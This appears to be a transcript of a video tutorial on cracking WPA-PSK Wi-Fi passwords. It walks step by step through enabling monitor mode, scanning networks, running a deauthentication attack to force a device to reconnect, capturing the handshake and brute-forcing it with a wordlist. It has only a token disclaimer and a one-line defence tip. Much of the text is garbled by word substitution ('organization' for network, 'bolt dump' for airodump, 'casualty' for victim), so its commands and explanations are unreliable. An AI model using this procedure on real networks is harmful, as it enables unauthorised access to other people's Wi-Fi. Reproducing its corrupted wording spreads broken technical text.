no matter where you go if you switch on Wi-Fi you're going to find a ton of networks that probably use wpa psk encryption now since you clicked on this video you probably know that these kinds of networks are easily hackable but do remember this is entirely for educational purposes and you should never do this on strangers network as it is illegal now with that out of the way I'm going to explain why and how it works how actually to do it and how to protect yourself against it so every
the time you connect to a network from a wireless device a handshake is sent from the device to the router this handshake happens to contain the encrypted password now it's not possible to reverse the encrypted password but what you can do is use something called a word list attack a word list is a huge text file containing thousands of passwords and if you happen to encrypt all of these passwords and compare both the actual handshake password and the encrypted password
whenever they match you'll know what the real password is so now that you know how it works how do you actually do it so the first thing you're going to need is a computer running linux the operating system i'll be using is kali linux since it comes with all the tools i need pre-installed and if you want to run it on another linux distribution all you need to do is download these packages another thing you might need if your computer's network card doesn't support mono mode is an external network card like this cheap tp-link adapter you'll know if you need it with the next step so now i need to know which network i want to attack which in my case is angelus network but simply having the name is not enough to figure out more information about the target first we need to figure out what the name of your wireless interface is to do this open up a terminal and write ipa now here are all of your network interfaces the wireless ones will start with wlan something for example mine is wlan0 which stands for wireless local area network zero what i want to do now is turn on monitor mode for this network card so that i can start receiving all of the traffic that's around me to do this i'm going to use a tool called airman.ng the specific command is airman minus ng start followed by the wireless network interface which in my case is wlan0 so if you happen to have wlan 1 then you would use wlan 1. this command will switch the mode of your network
card from managed to monitor which also means that your internet will break so you won't be able to look anything up on
now if you write iw config on any console you're going to be able to see that the network's cart mode has been turned into monitor if this isn't the case that means that your network card doesn't support monitor mode and you're going to need the adapter i showed
prior or some other option likewise note that turning on mono mode will change the name of your remote connection point so for instance a speedy ipa shows that could change from w90 to wlan 0 mother now that screen mode is on I need to begin paying attention to the organizations that are all around me with the order air dump less ng followed by the organization's point of interaction that has monormal turned on so for my situation wlan 0 mother here you can see the organizations that are all close by and you can see that my organization is here too now what you need to keep from here is the channel of your organization and the bss id which for my situation is this to leave this mode you can press ctrl c on the console now with the bssid and the channel of my organization saved I can utilize bolt dump short ng less d followed by the bssid less c followed by the channel number less w followed by the name of the record that will be traded that will contain the handshake we will have to address the secret key lastly the organization interface which is wlan0mon running this order will show you the gadgets that are all right now associated with that organization and you can see that assuming I look into a video on youtube how much bundles being shipped off a gadget increment a ton so this would be the ipad for instance so as I recently made sense of I need to catch the handshake when the gadget interfaces with the web yet this gadget is now associated so what I believe that should do will be do a de-verification assault to compel it to reconnect once more so I can catch the handshake and I need to keep this window
with bolt dump endlessly opening a second terminal to run more orders I for one utilized eliminator which let me split a solitary terminal into numerous windows 10 out of 10 would prescribe to deauthenticate I can utilize the I replay less ng bundle so the boundaries here will be air replay less ng followed by - 0 which implies the verification we will send 10d validation parcels less a followed by the bssid of the switch short c followed by the casualty's essid
and afterward, at last, the organization interface so here we are sending a sum of 10 d verification bundles to the iPad, and presently assuming you press enter you can see that the iPad gets strongly separated associates once more and the handshake is caught however remember that handshakes some of the time aren't caught the initial occasion when you could have to do this two or multiple times now that the handshake is caught I can stop bolt dump with ctrl c and you can see that a record has been saved in the ongoing registry with the name I gave it before now kali linux has two or three-word records as of now pre-introduced in this index the one I'll utilize is the rokhu.txt which is the greatest document containing the most passwords on the planet the order used to break is aircrack short ng less w followed by the area of the word list which is here trailed by the name
of the catch document after letting that run for some time you can see that a match was found and that this is the secret word
for my organization now your web association will, in any case, be broken after this and to fix that you can either restart your PC or do airmon less ng stop followed by the screen interface which for my situation is wlan0 mon however at that point it will, in any case, be broken so presently you really want to restart the organization administrations with systemctl we start net followed by a reference mark which implies that it will restart all that beginnings with a net so like organization something so now that we've gone through how it functions and how to do it how would you truly safeguard yourself against this there's sadly nothing you can do against the confirmation yet to forestall the silent assault you just need to pick an extremely lengthy irregular secret phrase that is probably not going to be found in any word list and definitely that's the long and short of it for this blog assuming you delighted in go ahead and leave a like and tien thank you for observing
